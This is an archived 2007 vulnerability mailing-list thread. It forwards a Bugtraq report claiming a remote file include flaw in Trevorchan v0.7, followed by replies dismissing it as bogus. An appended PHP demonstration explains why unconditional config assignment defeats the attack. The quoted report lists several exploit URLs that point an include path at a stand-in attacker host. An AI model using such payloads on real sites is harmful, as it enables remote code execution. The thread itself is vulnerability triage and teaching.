[VIM] [Bogus] [ilkerkandemir at mynet.com: Trevorchan <= v0.7 Remote File Include Vulnerability] (fwd)
rkeith at securityfocus.com
Mon Jan 15 10:04:19 EST 2007
The tc_config parameter is clearly defined in the config.php file, which
is called at the beginning of every script.
---------- Forwarded message ----------
Date: Sat, 13 Jan 2007 10:00:46 -0700
From: Teo Adams <tadams at securityfocus.com>
Subject: [Bogus] V [ilkerkandemir at mynet.com: Trevorchan <= v0.7 Remote File Include Vulnerability]
All of these scripts include a config file that sanitizes the reported
parameter.
> ----- Forwarded message from ilkerkandemir at mynet.com -----
>
> From: ilkerkandemir at mynet.com
> Subject: Trevorchan <= v0.7 Remote File Include Vulnerability
> To: bugtraq at securityfocus.com
> Date: 13 Jan 2007 11:33:28 -0000
> X-Mailer: MIME-tools 5.411 (Entity 5.404)
> Message-ID: <20070113113328.6236.qmail at securityfocus.com>
>
>
> -------------------------------------------------------------------------------------------------------------------
>
> AYYILDIZ.ORG PreSents...
>
>
>
> Script:Trevorchan v0.7
> Download: http://rel.trevorchan.org/Releasev07.zip
>
> Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>
>
>
>
> Code:
> require_once($tc_config['rootdir']."/inc/functions.php");
> require_once($tc_config['rootdir']."/inc/encryption.php");
>
>
> -------------------------------------------------------------------------------------------------------------------
>
> Exploit: upgrade.php?tc_config[rootdir]=http://attacker.txt?
> paint_save.php?tc_config[rootdir]=http://attacker.txt?
> menu.php?tc_config[rootdir]=http://attacker.txt?
> manage.php?tc_config[rootdir]=http://attacker.txt?
> banned.php?tc_config[rootdir]=http://attacker.txt?
>
> -------------------------------------------------------------------------------------------------------------------
>
> Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR
> Special Tnx: AYYILDIZ.ORG
>
> ----- End forwarded message -----
>
--
Rob Keith
Symantec
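The reason the report is bogus comes down to ordering: with register_globals on, a request like ?tc_config[rootdir]=... does populate $tc_config before the script runs, but if config.php then assigns $tc_config['rootdir'] unconditionally before the require_once lines, the attacker's value is gone by the time it is used. The following is an added illustration, not Trevorchan's code: it simulates the register_globals behaviour with extract() and contrasts a hypothetical config.php that assigns the root directory unconditionally (what the reply describes) with a hypothetical one that only fills in a missing value, which would be exploitable. The directory path, function names and the allow_url_include check are assumptions for the demonstration.

```php
<?php
// Added example, not Trevorchan code. Shows why the reported RFI depends on
// whether config.php (re)assigns $tc_config before it is used in require_once.

// Constructed attacker request, equivalent to:
//   upgrade.php?tc_config[rootdir]=http://attacker.txt?
$_GET = ['tc_config' => ['rootdir' => 'http://attacker.txt?']];

// What register_globals (PHP < 5.4) did at script start: every request
// parameter becomes a global variable, including array-shaped ones.
function simulate_register_globals(array $request): array
{
    extract($request, EXTR_OVERWRITE);   // creates $tc_config in this scope
    return isset($tc_config) ? $tc_config : [];
}

// Hypothetical config.php that sets the root directory unconditionally,
// as the reply says Trevorchan's config.php does (directory is an assumption).
function config_unconditional(array $tc_config): array
{
    $tc_config = [];                               // discard anything pre-set
    $tc_config['rootdir'] = '/var/www/trevorchan';
    return $tc_config;
}

// Hypothetical config.php that only fills in a missing value. This shape
// would let the request-supplied value survive into require_once.
function config_conditional(array $tc_config): array
{
    if (!isset($tc_config['rootdir'])) {
        $tc_config['rootdir'] = '/var/www/trevorchan';
    }
    return $tc_config;
}

// The expression from the advisory, reduced to the path it would include.
function include_path(array $tc_config): string
{
    return $tc_config['rootdir'] . "/inc/functions.php";
}

// True when the resolved path is a URL, i.e. a remote include would be
// attempted. Whether PHP actually fetches it also needs allow_url_include
// (and, before PHP 5.2, allow_url_fopen) to be enabled.
function is_remote_include(string $path): bool
{
    return (bool) preg_match('#^[a-z][a-z0-9+.-]*://#i', $path);
}

$fromRequest = simulate_register_globals($_GET);

$safe = config_unconditional($fromRequest);
printf("unconditional config: %s (remote: %s)\n",
    include_path($safe), is_remote_include(include_path($safe)) ? 'yes' : 'no');

$weak = config_conditional($fromRequest);
printf("conditional config:   %s (remote: %s)\n",
    include_path($weak), is_remote_include(include_path($weak)) ? 'yes' : 'no');

printf("allow_url_include is %s on this host\n",
    ini_get('allow_url_include') ? 'enabled' : 'disabled');
```

Run with `php example.php`: the unconditional form resolves to the local /inc/functions.php path regardless of the request, while the conditional form keeps the URL from the request. When triaging an RFI report of this kind, the check is exactly this: find where the variable used in include/require is assigned, confirm that assignment runs before every use and does not depend on a pre-existing value, and only then consider register_globals and allow_url_include.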